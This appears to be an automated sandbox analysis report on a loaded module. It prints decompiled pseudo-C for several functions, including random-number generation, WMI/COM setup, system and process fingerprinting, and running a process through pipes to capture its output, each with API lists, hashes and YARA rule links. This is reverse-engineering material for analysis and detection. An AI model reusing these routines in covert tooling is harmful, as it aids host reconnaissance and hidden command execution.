Opcode Fuzzy Hash: 9666fa5b7544119ad2a1acce946c7c4cd061c2ef1cd09bcb1a5d5842fa234375
Instruction Fuzzy Hash: ACB14CB1900258AFEB55CFA4CC88E9E7BF8EF48390F108069F505EB291DB749E44CB61

Uniqueness

Uniqueness Score: -1.00%

Function 100116B8, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 70
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 28%

			E100116B8(signed int* _a4) {
				char _v8;
				_Unknown_base(*)()* _v12;
				_Unknown_base(*)()* _v16;
				char _v20;
				_Unknown_base(*)()* _t16;
				_Unknown_base(*)()* _t17;
				void* _t22;
				intOrPtr* _t28;
				signed int _t29;
				signed int _t30;
				struct HINSTANCE__* _t32;
				void* _t34;

				_t30 = 0;
				_v8 = 0;
				_t32 = GetModuleHandleA("advapi32.dll");
				if(_t32 == 0) {
					L9:
					return 1;
				}
				_t16 = GetProcAddress(_t32, "CryptAcquireContextA");
				_v12 = _t16;
				if(_t16 == 0) {
					goto L9;
				}
				_t17 = GetProcAddress(_t32, "CryptGenRandom");
				_v16 = _t17;
				if(_t17 == 0) {
					goto L9;
				}
				_t28 = GetProcAddress(_t32, "CryptReleaseContext");
				if(_t28 == 0) {
					goto L9;
				}
				_push(0xf0000000);
				_push(1);
				_push(0);
				_push(0);
				_push( &_v8);
				if(_v12() == 0) {
					goto L9;
				}
				_t22 = _v16(_v8, 4,  &_v20);
				 *_t28(_v8, 0);
				if(_t22 == 0) {
					goto L9;
				}
				_t29 = 0;
				do {
					_t30 = _t30 << 0x00000008 |  *(_t34 + _t29 - 0x10) & 0x000000ff;
					_t29 = _t29 + 1;
				} while (_t29 < 4);
				 *_a4 = _t30;
				return 0;
			}

APIs

GetModuleHandleA.KERNEL32(advapi32.dll,00000000,00000000,00000000,1000765A,?,?,00000000,?), ref: 100116CB
GetProcAddress.KERNEL32(00000000,CryptAcquireContextA,?,?,00000000,?), ref: 100116E3
GetProcAddress.KERNEL32(00000000,CryptGenRandom,?,?,00000000,?), ref: 100116F2
GetProcAddress.KERNEL32(00000000,CryptReleaseContext,?,?,00000000,?), ref: 10011701

Strings

advapi32.dll, xrefs: 100116C3
CryptGenRandom, xrefs: 100116EC
CryptAcquireContextA, xrefs: 100116DD
CryptReleaseContext, xrefs: 100116FB

Memory Dump Source

Source File: 00000009.00000002.554724800.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.554640599.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AddressProc$HandleModule
String ID: CryptAcquireContextA$CryptGenRandom$CryptReleaseContext$advapi32.dll
API String ID: 667068680-129414566
Opcode ID: 20942a7a4906dbf7eb0602444a63a434b6f70734ef2710fea449a0a33fd0044b
Instruction ID: d36a475728834fa58dcafee8eb85b3ba20c501ff2e9645169ff1056c09a1da39
Opcode Fuzzy Hash: 20942a7a4906dbf7eb0602444a63a434b6f70734ef2710fea449a0a33fd0044b
Instruction Fuzzy Hash: 57117735D04615BBDB52DBAA8C84EEF7BF9EF45680F010064EA15FA240DB30DB408764

Uniqueness

Uniqueness Score: -1.00%

Function 10012122, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 98
stringCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E10012122(char* _a4, intOrPtr _a8, long long _a12, signed int _a20) {
				signed int _t12;
				signed int _t13;
				int _t15;
				char* _t24;
				char* _t26;
				char* _t28;
				char* _t29;
				signed int _t40;
				char* _t43;
				char* _t45;
				long long* _t47;

				_t12 = _a20;
				if(_t12 == 0) {
					_t12 = 0x11;
				}
				_t26 = _a4;
				_push(_t30);
				 *_t47 = _a12;
				_push(_t12);
				_push("%.*g");
				_push(_a8);
				_push(_t26);
				L10012285();
				_t40 = _t12;
				if(_t40 < 0 || _t40 >= _a8) {
					L19:
					_t13 = _t12 | 0xffffffff;
					goto L20;
				} else {
					L100122CD();
					_t15 =  *((intOrPtr*)( *_t12));
					if(_t15 != 0x2e) {
						_t24 = strchr(_t26, _t15);
						if(_t24 != 0) {
							 *_t24 = 0x2e;
						}
					}
					if(strchr(_t26, 0x2e) != 0 || strchr(_t26, 0x65) != 0) {
						L11:
						_t43 = strchr(_t26, 0x65);
						_t28 = _t43;
						if(_t43 == 0) {
							L18:
							_t13 = _t40;
							L20:
							return _t13;
						}
						_t45 = _t43 + 1;
						_t29 = _t28 + 2;
						if( *_t45 == 0x2d) {
							_t45 = _t29;
						}
						while( *_t29 == 0x30) {
							_t29 = _t29 + 1;
						}
						if(_t29 != _t45) {
							E10008706(_t45, _t29, _t40 - _t29 + _a4);
							_t40 = _t40 + _t45 - _t29;
						}
						goto L18;
					} else {
						_t6 = _t40 + 3; // 0x100109b2
						_t12 = _t6;
						if(_t12 >= _a8) {
							goto L19;
						}
						_t26[_t40] = 0x302e;
						( &(_t26[2]))[_t40] = 0;
						_t40 = _t40 + 2;
						goto L11;
					}
				}
			}

APIs

_snprintf.MSVCRT ref: 10012146
localeconv.MSVCRT ref: 10012161
strchr.MSVCRT ref: 10012173
strchr.MSVCRT ref: 10012184
strchr.MSVCRT ref: 10012192
strchr.MSVCRT ref: 100121B7

Strings

%.*g, xrefs: 1001213D

Memory Dump Source

Source File: 00000009.00000002.554724800.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.554640599.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: strchr$_snprintflocaleconv
String ID: %.*g
API String ID: 1910550357-952554281
Opcode ID: c4e2036c81f1f18131b8e055db18669b76aa49e64ef9a1be148b7d3467e3c398
Instruction ID: 8636af6e6c8ef7ea176c693fecce787b547d9a6025bf48258b91e4e7d6eda4ac
Opcode Fuzzy Hash: c4e2036c81f1f18131b8e055db18669b76aa49e64ef9a1be148b7d3467e3c398
Instruction Fuzzy Hash: 562138FA6046567AD311CA689CC6B5E3BDCDF15260F250115FE509E182E674ECF483A0

Uniqueness

Uniqueness Score: -1.00%

Function 100102B2, Relevance: 10.9, APIs: 2, Strings: 4, Instructions: 445COMMON

Download Yara Rule

APIs

_snprintf.MSVCRT ref: 10010332
qsort.MSVCRT ref: 100105B0

Strings

false, xrefs: 10010315
null, xrefs: 100102F7
%I64d, xrefs: 10010324
true, xrefs: 10010309

Memory Dump Source

Source File: 00000009.00000002.554724800.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.554640599.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _snprintfqsort
String ID: %I64d$false$null$true
API String ID: 756996078-4285102228
Opcode ID: 27ee6084afeff88239f383b3bb26a63d700df7a8d62648484173ceb74af6d73e
Instruction ID: b3da69db5d3f4e878d7882629df3b6b2364259ca5c53272952ed0c313758977d
Opcode Fuzzy Hash: 27ee6084afeff88239f383b3bb26a63d700df7a8d62648484173ceb74af6d73e
Instruction Fuzzy Hash: BCE150B1A0024ABBDF11DE64CC45EEF3BA9EF45384F108015FD549E141EBB5EAE19BA0

Uniqueness

Uniqueness Score: -1.00%

Function 10004A0B, Relevance: 9.3, APIs: 6, Instructions: 285
stringCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E10004A0B(void* __ecx, void* __edx, void* __fp0, intOrPtr* _a4, WCHAR* _a8, signed int _a12) {
				char _v516;
				void _v1044;
				char _v1076;
				signed int _v1080;
				signed int _v1096;
				WCHAR* _v1100;
				intOrPtr _v1104;
				signed int _v1108;
				intOrPtr _v1112;
				intOrPtr _v1116;
				char _v1144;
				char _v1148;
				void* __esi;
				intOrPtr _t66;
				intOrPtr _t73;
				signed int _t75;
				intOrPtr _t76;
				signed int _t81;
				WCHAR* _t87;
				void* _t89;
				signed int _t90;
				signed int _t91;
				signed int _t93;
				signed int _t94;
				WCHAR* _t96;
				intOrPtr _t106;
				intOrPtr _t107;
				void* _t108;
				intOrPtr _t109;
				signed char _t116;
				WCHAR* _t118;
				void* _t122;
				signed int _t123;
				intOrPtr _t125;
				void* _t128;
				void* _t129;
				WCHAR* _t130;
				void* _t134;
				void* _t141;
				void* _t143;
				WCHAR* _t145;
				signed int _t153;
				void* _t154;
				void* _t178;
				signed int _t180;
				void* _t181;
				void* _t183;
				void* _t187;
				signed int _t188;
				WCHAR* _t190;
				signed int _t191;
				signed int _t192;
				intOrPtr* _t194;
				signed int _t196;
				void* _t199;
				void* _t200;
				void* _t201;
				void* _t202;
				intOrPtr* _t203;
				void* _t208;

				_t208 = __fp0;
				_push(_t191);
				_t128 = __edx;
				_t187 = __ecx;
				_t192 = _t191 | 0xffffffff;
				memset( &_v1044, 0, 0x20c);
				_t199 = (_t196 & 0xfffffff8) - 0x454 + 0xc;
				_v1108 = 1;
				if(_t187 != 0) {
					_t123 =  *0x1001e688; // 0x2e50590
					_t125 =  *0x1001e68c; // 0x2ecfc68
					_v1116 =  *((intOrPtr*)(_t125 + 0x68))(_t187,  *((intOrPtr*)( *((intOrPtr*)(_t123 + 0x110)))));
				}
				if(E1000BB8D(_t187) != 0) {
					L4:
					_t134 = _t128;
					_t66 = E1000B7A8(_t134,  &_v516);
					_push(_t134);
					_v1104 = _t66;
					E1000B67D(_t66,  &_v1076, _t206, _t208);
					_t129 = E100049C7( &_v1076,  &_v1076, _t206);
					_t141 = E1000D400( &_v1076, E1000C379( &_v1076), 0);
					E1000B88A(_t141,  &_v1100, _t208);
					_t175 =  &_v1076;
					_t73 = E10002C8F(_t187,  &_v1076, _t206, _t208);
					_v1112 = _t73;
					_t143 = _t141;
					if(_t73 != 0) {
						_push(0);
						_push(_t129);
						_push("\\");
						_t130 = E100092E5(_t73);
						_t200 = _t199 + 0x10;
						_t75 =  *0x1001e688; // 0x2e50590
						__eflags =  *((intOrPtr*)(_t75 + 0x214)) - 3;
						if( *((intOrPtr*)(_t75 + 0x214)) != 3) {
							L12:
							__eflags = _v1108;
							if(__eflags != 0) {
								_t76 = E100091E3(_v1112);
								_t145 = _t130;
								 *0x1001e740 = _t76;
								 *0x1001e738 = E100091E3(_t145);
								L17:
								_push(_t145);
								_t188 = E10009B43( &_v1044, _t187, _t208, _v1104,  &_v1080,  &_v1100);
								_t201 = _t200 + 0x10;
								__eflags = _t188;
								if(_t188 == 0) {
									goto L41;
								}
								_push(0x1001b9ca);
								E10009F48(0xe);
								E10009F6C(_t188, _t208, _t130);
								_t194 = _a4;
								_v1096 = _v1096 & 0x00000000;
								_push(2);
								_v1100 =  *_t194;
								_push(8);
								_push( &_v1100);
								_t178 = 0xb;
								E1000A0AB(_t188, _t178, _t208);
								_t179 =  *(_t194 + 0x10);
								_t202 = _t201 + 0xc;
								__eflags =  *(_t194 + 0x10);
								if( *(_t194 + 0x10) != 0) {
									E1000A3ED(_t188, _t179, _t208);
								}
								_t180 =  *(_t194 + 0xc);
								__eflags = _t180;
								if(_t180 != 0) {
									E1000A3ED(_t188, _t180, _t208);
								}
								_t87 = E1000980C(0);
								_push(2);
								_v1100 = _t87;
								_t153 = _t188;
								_push(8);
								_v1096 = _t180;
								_push( &_v1100);
								_t181 = 2;
								_t89 = E1000A0AB(_t153, _t181, _t208);
								_t203 = _t202 + 0xc;
								__eflags = _v1108;
								if(_v1108 == 0) {
									_t153 =  *0x1001e688; // 0x2e50590
									__eflags =  *((intOrPtr*)(_t153 + 0xa4)) - 1;
									if(__eflags != 0) {
										_t90 = E1000FC1F(_t89, _t181, _t208, 0, _t130, 0);
										_t203 = _t203 + 0xc;
										goto L26;
									}
									_t153 = _t153 + 0x228;
									goto L25;
								} else {
									_t91 =  *0x1001e688; // 0x2e50590
									__eflags =  *((intOrPtr*)(_t91 + 0xa4)) - 1;
									if(__eflags != 0) {
										L32:
										__eflags =  *(_t91 + 0x1898) & 0x00000082;
										if(( *(_t91 + 0x1898) & 0x00000082) != 0) {
											_t183 = 0x64;
											E1000E23E(_t183);
										}
										E100052C0( &_v1076, _t208);
										_t190 = _a8;
										_t154 = _t153;
										__eflags = _t190;
										if(_t190 != 0) {
											_t94 =  *0x1001e688; // 0x2e50590
											__eflags =  *((intOrPtr*)(_t94 + 0xa0)) - 1;
											if( *((intOrPtr*)(_t94 + 0xa0)) != 1) {
												lstrcpyW(_t190, _t130);
											} else {
												_t96 = E1000109A(_t154, 0x228);
												_v1100 = _t96;
												lstrcpyW(_t190, _t96);
												E100085D5( &_v1100);
												 *_t203 = "\"";
												lstrcatW(_t190, ??);
												lstrcatW(_t190, _t130);
												lstrcatW(_t190, "\"");
											}
										}
										_t93 = _a12;
										__eflags = _t93;
										if(_t93 != 0) {
											 *_t93 = _v1104;
										}
										_t192 = 0;
										__eflags = 0;
										goto L41;
									}
									_t51 = _t91 + 0x228; // 0x2e507b8
									_t153 = _t51;
									L25:
									_t90 = E1000553F(_t153, _t130, __eflags);
									L26:
									__eflags = _t90;
									if(_t90 >= 0) {
										_t91 =  *0x1001e688; // 0x2e50590
										goto L32;
									}
									_push(0xfffffffd);
									L6:
									_pop(_t192);
									goto L41;
								}
							}
							_t106 = E1000C292(_v1104, __eflags);
							_v1112 = _t106;
							_t107 =  *0x1001e684; // 0x2ecfaa0
							_t108 =  *((intOrPtr*)(_t107 + 0xd0))(_t106, 0x80003, 6, 0xff, 0x400, 0x400, 0, 0);
							__eflags = _t108 - _t192;
							if(_t108 != _t192) {
								_t109 =  *0x1001e684; // 0x2ecfaa0
								 *((intOrPtr*)(_t109 + 0x30))();
								E1000861A( &_v1148, _t192);
								_t145 = _t108;
								goto L17;
							}
							E1000861A( &_v1144, _t192);
							_t81 = 1;
							goto L42;
						}
						_t116 =  *(_t75 + 0x1898);
						__eflags = _t116 & 0x00000004;
						if((_t116 & 0x00000004) == 0) {
							__eflags = _t116;
							if(_t116 != 0) {
								goto L12;
							}
							L11:
							E1000E286(_v1112, _t175);
							goto L12;
						}
						_v1080 = _v1080 & 0x00000000;
						_t118 = E100095E1(_t143, 0x879);
						_v1100 = _t118;
						_t175 = _t118;
						E1000BFEC(0x80000002, _t118, _v1112, 4,  &_v1080, 4);
						E100085D5( &_v1100);
						_t200 = _t200 + 0x14;
						goto L11;
					}
					_push(0xfffffffe);
					goto L6;
				} else {
					_t122 = E10002BA4( &_v1044, _t192, 0x105);
					_t206 = _t122;
					if(_t122 == 0) {
						L41:
						_t81 = _t192;
						L42:
						return _t81;
					}
					goto L4;
				}
			}

APIs

memset.MSVCRT ref: 10004A2D
lstrcpyW.KERNEL32(00000000,00000000), ref: 10004D1F
lstrcatW.KERNEL32 ref: 10004D3D
lstrcatW.KERNEL32 ref: 10004D41
lstrcatW.KERNEL32 ref: 10004D49
lstrcpyW.KERNEL32(00000000,00000000), ref: 10004D4F

Memory Dump Source

Source File: 00000009.00000002.554724800.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.554640599.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: lstrcat$lstrcpy$memset
String ID:
API String ID: 1985475764-0
Opcode ID: 9c0abdd94eabe914945b90b3f23502be936d310f05b3141c419733170b2e759b
Instruction ID: f7566e60c9d6103eeec9fdfcf7230380432adf105638aba250afc4f9be1d7fc6
Opcode Fuzzy Hash: 9c0abdd94eabe914945b90b3f23502be936d310f05b3141c419733170b2e759b
Instruction Fuzzy Hash: 60919AB5604305AFF314DB20CC86F6E73E9EB84390F12492EF5958B299EF70E9448B56

Uniqueness

Uniqueness Score: -1.00%

Function 1000D748, Relevance: 9.1, APIs: 6, Instructions: 87memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(00000000), ref: 1000D75C
SysAllocString.OLEAUT32(?), ref: 1000D764
SysAllocString.OLEAUT32(00000000), ref: 1000D778
SysFreeString.OLEAUT32(?), ref: 1000D7F3
SysFreeString.OLEAUT32(?), ref: 1000D7F6
SysFreeString.OLEAUT32(?), ref: 1000D7FB

Memory Dump Source

Source File: 00000009.00000002.554724800.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.554640599.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: 29a52338a57cec81f6671dbadbd3888b240f1232313cc897351bf5da0bc70bfa
Instruction ID: 27e2c139421265cbd0753a0a77cd0a813644ebbf917d6f260799ceccbc4dcd54
Opcode Fuzzy Hash: 29a52338a57cec81f6671dbadbd3888b240f1232313cc897351bf5da0bc70bfa
Instruction Fuzzy Hash: BC21FB75900219BFDB01DFA5CC88DAFBBBDEF48294B10449AF505A7250EA71AE01CB60

Uniqueness

Uniqueness Score: -1.00%

Function 100107F7, Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 158COMMON

Download Yara Rule

Strings

\u%04X, xrefs: 10010911
@, xrefs: 10010865
\u%04X\u%04X, xrefs: 10010950

Memory Dump Source

Source File: 00000009.00000002.554724800.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.554640599.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: @$\u%04X$\u%04X\u%04X
API String ID: 0-2132903582
Opcode ID: 546ce5fa566931b67c5079da5f298430883b327ac1d9d5cea2f582d755a7ec14
Instruction ID: 18f8f7fd9c3af9e43ea2b41f69ba211a484cfe72345a25ce6a4dcd653cb28466
Opcode Fuzzy Hash: 546ce5fa566931b67c5079da5f298430883b327ac1d9d5cea2f582d755a7ec14
Instruction Fuzzy Hash: F1411932B04145A7EB24CA988DA5BAE3AA8DF44384F200115FDC6DE296D6F5CED1C7D1

Uniqueness

Uniqueness Score: -1.00%

Function 1000D523, Relevance: 7.6, APIs: 5, Instructions: 87
commemoryCOMMON

Download Yara Rule

C-Code - Quality: 30%

			E1000D523(void* __ecx) {
				char _v8;
				void* _v12;
				char* _t15;
				intOrPtr* _t16;
				void* _t21;
				intOrPtr* _t23;
				intOrPtr* _t24;
				intOrPtr* _t25;
				void* _t30;
				void* _t33;

				_v12 = 0;
				_v8 = 0;
				__imp__CoInitializeEx(0, 0, _t30, _t33, __ecx, __ecx);
				__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 0, 3, 0, 0, 0);
				_t15 =  &_v12;
				__imp__CoCreateInstance(0x1001b848, 0, 1, 0x1001b858, _t15);
				if(_t15 < 0) {
					L5:
					_t23 = _v8;
					if(_t23 != 0) {
						 *((intOrPtr*)( *_t23 + 8))(_t23);
					}
					_t24 = _v12;
					if(_t24 != 0) {
						 *((intOrPtr*)( *_t24 + 8))(_t24);
					}
					_t16 = 0;
				} else {
					__imp__#2(__ecx);
					_t25 = _v12;
					_t21 =  *((intOrPtr*)( *_t25 + 0xc))(_t25, _t15, 0, 0, 0, 0, 0, 0,  &_v8);
					if(_t21 < 0) {
						goto L5;
					} else {
						__imp__CoSetProxyBlanket(_v8, 0xa, 0, 0, 3, 3, 0, 0);
						if(_t21 < 0) {
							goto L5;
						} else {
							_t16 = E10008604(8);
							if(_t16 == 0) {
								goto L5;
							} else {
								 *((intOrPtr*)(_t16 + 4)) = _v12;
								 *_t16 = _v8;
							}
						}
					}
				}
				return _t16;
			}

APIs

CoInitializeEx.OLE32(00000000,00000000), ref: 1000D536
CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 1000D547
CoCreateInstance.OLE32(1001B848,00000000,00000001,1001B858,?), ref: 1000D55E
SysAllocString.OLEAUT32(00000000), ref: 1000D569
CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 1000D594

Part of subcall function 10008604: HeapAlloc.KERNEL32(00000008,?,?,10008F84,00000100,?,10005FCB), ref: 10008612

Memory Dump Source

Source File: 00000009.00000002.554724800.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.554640599.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AllocInitialize$BlanketCreateHeapInstanceProxySecurityString
String ID:
API String ID: 2855449287-0
Opcode ID: e3036c98c6c22c681c85725f4620ce73059aed9228951fa92778f01e46537caa
Instruction ID: 5bbdf4e47082d7f099f202f2147c83233ba5ae9393f0558d240139af4bbb2059
Opcode Fuzzy Hash: e3036c98c6c22c681c85725f4620ce73059aed9228951fa92778f01e46537caa
Instruction Fuzzy Hash: A6210931600255BBEB249B66CC4DE6FBFBCEFC6B55F11415EB901A6290DB70DA00CA30

Uniqueness

Uniqueness Score: -1.00%

Function 100121FF, Relevance: 7.6, APIs: 5, Instructions: 52
stringCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E100121FF(char* __eax, char** _a4, long long* _a8) {
				char* _v8;
				long long _v16;
				char* _t9;
				signed char _t11;
				char** _t19;
				char _t22;
				long long _t32;
				long long _t33;

				_t9 = __eax;
				L100122CD();
				_t19 = _a4;
				_t22 =  *__eax;
				if( *_t22 != 0x2e) {
					_t9 = strchr( *_t19, 0x2e);
					if(_t9 != 0) {
						 *_t9 =  *_t22;
					}
				}
				L10012291();
				 *_t9 =  *_t9 & 0x00000000;
				_t11 = strtod( *_t19,  &_v8);
				asm("fst qword [ebp-0xc]");
				_t32 =  *0x10018250;
				asm("fucomp st1");
				asm("fnstsw ax");
				if((_t11 & 0x00000044) != 0) {
					L5:
					st0 = _t32;
					L10012291();
					if( *_t11 != 0x22) {
						_t33 = _v16;
						goto L8;
					} else {
						return _t11 | 0xffffffff;
					}
				} else {
					_t33 =  *0x10018258;
					asm("fucomp st1");
					asm("fnstsw ax");
					if((_t11 & 0x00000044) != 0) {
						L8:
						 *_a8 = _t33;
						return 0;
					} else {
						goto L5;
					}
				}
			}

APIs

localeconv.MSVCRT ref: 10012207
strchr.MSVCRT ref: 1001221A
_errno.MSVCRT ref: 10012229
strtod.MSVCRT ref: 10012237
_errno.MSVCRT ref: 10012264

Memory Dump Source

Source File: 00000009.00000002.554724800.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.554640599.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _errno$localeconvstrchrstrtod
String ID:
API String ID: 1035490122-0
Opcode ID: 92f26e4a364c3d80a29fdd1e2403d26020c0f2beabb2bc5ff205f5abd7f33c48
Instruction ID: a7fe3fef6b6346813f09e77c4cbf996122cf10ff1875fbe8eea6711f7156c08d
Opcode Fuzzy Hash: 92f26e4a364c3d80a29fdd1e2403d26020c0f2beabb2bc5ff205f5abd7f33c48
Instruction Fuzzy Hash: 5D0124B9900145FADB02AF20E90168D3BA4EF463A0F3141C0E9806E1A1CB75D9F4C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 1000CF84, Relevance: 7.5, APIs: 5, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E1000CF84(void* __ecx) {
				intOrPtr _t11;
				long _t12;
				intOrPtr _t17;
				intOrPtr _t18;
				struct _OSVERSIONINFOA* _t29;

				_push(__ecx);
				_t29 =  *0x1001e688; // 0x2e50590
				GetCurrentProcess();
				_t11 = E1000BA05();
				_t1 = _t29 + 0x1644; // 0x2e51bd4
				_t25 = _t1;
				 *((intOrPtr*)(_t29 + 0x110)) = _t11;
				_t12 = GetModuleFileNameW(0, _t1, 0x105);
				_t33 = _t12;
				if(_t12 != 0) {
					_t12 = E10008FBE(_t25, _t33);
				}
				_t3 = _t29 + 0x228; // 0x2e507b8
				 *(_t29 + 0x1854) = _t12;
				 *((intOrPtr*)(_t29 + 0x434)) = E10008FBE(_t3, _t33);
				memset(_t29, 0, 0x9c);
				_t29->dwOSVersionInfoSize = 0x9c;
				GetVersionExA(_t29);
				 *((intOrPtr*)(_t29 + 0x1640)) = GetCurrentProcessId();
				_t17 = E1000E3B6(_t3);
				_t7 = _t29 + 0x220; // 0x2e507b0
				 *((intOrPtr*)(_t29 + 0x21c)) = _t17;
				_t18 = E1000E3F1(_t7);
				 *((intOrPtr*)(_t29 + 0x218)) = _t18;
				return _t18;
			}

APIs

GetCurrentProcess.KERNEL32(?,?,02E50590,?,10003545), ref: 1000CF90
GetModuleFileNameW.KERNEL32(00000000,02E51BD4,00000105,?,?,02E50590,?,10003545), ref: 1000CFB1
memset.MSVCRT ref: 1000CFE2
GetVersionExA.KERNEL32(02E50590,02E50590,?,10003545), ref: 1000CFED
GetCurrentProcessId.KERNEL32(?,10003545), ref: 1000CFF3

Memory Dump Source

Source File: 00000009.00000002.554724800.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.554640599.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CurrentProcess$FileModuleNameVersionmemset
String ID:
API String ID: 3581039275-0
Opcode ID: c3299e6d2f0b03601ba1cf598394421de32a902fba2cc4fff372b1365d944c65
Instruction ID: 6868e59ac51cffefd4345363f154aaa4011aa3255cd34e47fa6660c1185ef8f7
Opcode Fuzzy Hash: c3299e6d2f0b03601ba1cf598394421de32a902fba2cc4fff372b1365d944c65
Instruction Fuzzy Hash: ED015E749017149BE720DF70888AAEABBE5FF95350F00082DF59687251EB74B744CB51

Uniqueness

Uniqueness Score: -1.00%

Function 1000A9B7, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 177
pipeCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E1000A9B7(signed int __ecx) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				signed int _v24;
				char _v28;
				char _v32;
				char _v36;
				struct _SECURITY_ATTRIBUTES _v48;
				intOrPtr _v60;
				char _v64;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				short _v92;
				intOrPtr _v96;
				void _v140;
				intOrPtr _t77;
				void* _t79;
				intOrPtr _t85;
				intOrPtr _t87;
				intOrPtr _t89;
				intOrPtr _t92;
				intOrPtr _t98;
				intOrPtr _t100;
				intOrPtr _t102;
				long _t111;
				intOrPtr _t115;
				intOrPtr _t126;
				void* _t127;
				void* _t128;
				void* _t129;
				void* _t130;

				_t111 = 0;
				_v24 = __ecx;
				_v12 = 0;
				_v20 = 0;
				_t127 = 0;
				_v8 = 0;
				_v16 = 0;
				_v48.nLength = 0xc;
				_v48.lpSecurityDescriptor = 0;
				_v48.bInheritHandle = 1;
				_v28 = 0;
				memset( &_v140, 0, 0x44);
				asm("stosd");
				_t130 = _t129 + 0xc;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				if(CreatePipe( &_v12,  &_v20,  &_v48, 0) == 0) {
					L18:
					return 0;
				}
				if(CreatePipe( &_v8,  &_v16,  &_v48, 0) == 0) {
					L13:
					E1000861A( &_v28, 0);
					if(_v20 != 0) {
						_t77 =  *0x1001e684; // 0x2ecfaa0
						 *((intOrPtr*)(_t77 + 0x30))(_v20);
					}
					if(_v8 != 0) {
						_t115 =  *0x1001e684; // 0x2ecfaa0
						 *((intOrPtr*)(_t115 + 0x30))(_v8);
					}
					return _t111;
				}
				_t79 = _v16;
				_v76 = _t79;
				_v80 = _t79;
				_v84 = _v12;
				_v140 = 0x44;
				_v96 = 0x101;
				_v92 = 0;
				_t126 = E10008604(0x1001);
				_v28 = _t126;
				if(_t126 == 0) {
					goto L18;
				}
				_push( &_v64);
				_push( &_v140);
				_t85 =  *0x1001e684; // 0x2ecfaa0
				_push(0);
				_push(0);
				_push(0x8000000);
				_push(1);
				_push(0);
				_push(0);
				_push(_v24);
				_push(0);
				if( *((intOrPtr*)(_t85 + 0x38))() == 0) {
					goto L13;
				}
				_t87 =  *0x1001e684; // 0x2ecfaa0
				 *((intOrPtr*)(_t87 + 0x30))(_v12);
				_t89 =  *0x1001e684; // 0x2ecfaa0
				 *((intOrPtr*)(_t89 + 0x30))(_v16);
				_v24 = _v24 & 0;
				do {
					_t92 =  *0x1001e684; // 0x2ecfaa0
					_v36 =  *((intOrPtr*)(_t92 + 0x88))(_v8, _t126, 0x1000,  &_v24, 0);
					 *((char*)(_v24 + _t126)) = 0;
					if(_t111 == 0) {
						_t127 = E100091A6(_t126, 0);
					} else {
						_push(0);
						_push(_t126);
						_v32 = _t127;
						_t127 = E10009292(_t127);
						E1000861A( &_v32, 0xffffffff);
						_t130 = _t130 + 0x14;
					}
					_t111 = _t127;
					_v32 = _t127;
				} while (_v36 != 0);
				_push( &_v36);
				_push(E1000C379(_t127));
				_t98 =  *0x1001e68c; // 0x2ecfc68
				_push(_t127);
				if( *((intOrPtr*)(_t98 + 0xb8))() != 0) {
					L12:
					_t100 =  *0x1001e684; // 0x2ecfaa0
					 *((intOrPtr*)(_t100 + 0x30))(_v64);
					_t102 =  *0x1001e684; // 0x2ecfaa0
					 *((intOrPtr*)(_t102 + 0x30))(_v60);
					goto L13;
				}
				_t128 = E10009256(_t127);
				if(_t128 == 0) {
					goto L12;
				}
				E1000861A( &_v32, 0);
				return _t128;
			}

APIs

memset.MSVCRT ref: 1000A9F4
CreatePipe.KERNEL32(?,?,0000000C,00000000,00000000,00000000,00000000), ref: 1000AA18
CreatePipe.KERNEL32(100065A9,?,0000000C,00000000), ref: 1000AA2F

Part of subcall function 10008604: HeapAlloc.KERNEL32(00000008,?,?,10008F84,00000100,?,10005FCB), ref: 10008612

Part of subcall function 1000861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 10008660

Strings

D, xrefs: 1000AA4F

Memory Dump Source

Source File: 00000009.00000002.554724800.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.554640599.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateHeapPipe$AllocFreememset
String ID: D
API String ID: 488076629-2746444292
Opcode ID: 24234036bd44549ce90901f02aea0baf555124e47afd939409f04462bb315129
